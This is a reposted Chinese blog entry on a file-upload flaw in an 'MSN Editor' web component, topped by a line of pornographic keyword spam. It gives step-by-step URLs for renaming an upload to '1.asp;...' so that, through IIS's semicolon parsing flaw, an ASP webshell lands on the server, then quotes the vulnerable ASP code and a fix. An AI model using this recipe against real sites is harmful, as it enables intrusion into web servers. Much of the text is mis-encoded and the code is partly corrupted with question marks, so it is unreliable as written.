日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

MSN Editor 0DAY

發(fā)布時(shí)間:2024/4/14 编程问答 41 豆豆
生活随笔 收集整理的這篇文章主要介紹了 MSN Editor 0DAY 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

簡(jiǎn)單說(shuō)下利用的方法吧。
點(diǎn)擊圖片上傳后會(huì)出現(xiàn)上傳頁(yè)面,地址為

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=

用普通的圖片上傳后,地址為
http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012

很明顯。圖片的地址是根據(jù)RemNum后面的編號(hào)生成的。

利用很簡(jiǎn)單 配合IIS的解析漏洞,把RemNum后面的數(shù)據(jù)修改為1.asp;41513102009204012

變成下面這個(gè)地址

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012

然后在瀏覽器里打開

然后選擇你的腳本***上傳

將會(huì)返回下面的地址
uppic/1.asp;41513102009204012_2.gif

然后直接打開就是我們的小馬地址!

[紅科網(wǎng)安]漏洞修補(bǔ)建議:

關(guān)鍵代碼:

???????????? if editRemNum<>"" then????????????????
??????????????? remNum = editRemNum
???????????? else
??????????????? Randomize
??????????????? remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
???????????? end if
???????????? remFileName = remNum&"_"&(editImageNum+1)&".gif"
????????? end if

?

去掉自定義部分,只留下隨機(jī)參數(shù)即可。

保留代碼:

??????????????? Randomize
??????????????? remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
???????????? end if
???????????? remFileName = remNum&"_"&(editImageNum+1)&".gif"

文章如轉(zhuǎn)載,請(qǐng)注明轉(zhuǎn)載自【網(wǎng)管小王的獨(dú)立博客】:http://www.5iadmin.com/

轉(zhuǎn)載于:https://blog.51cto.com/shanzhai/924615

總結(jié)

以上是生活随笔為你收集整理的MSN Editor 0DAY的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。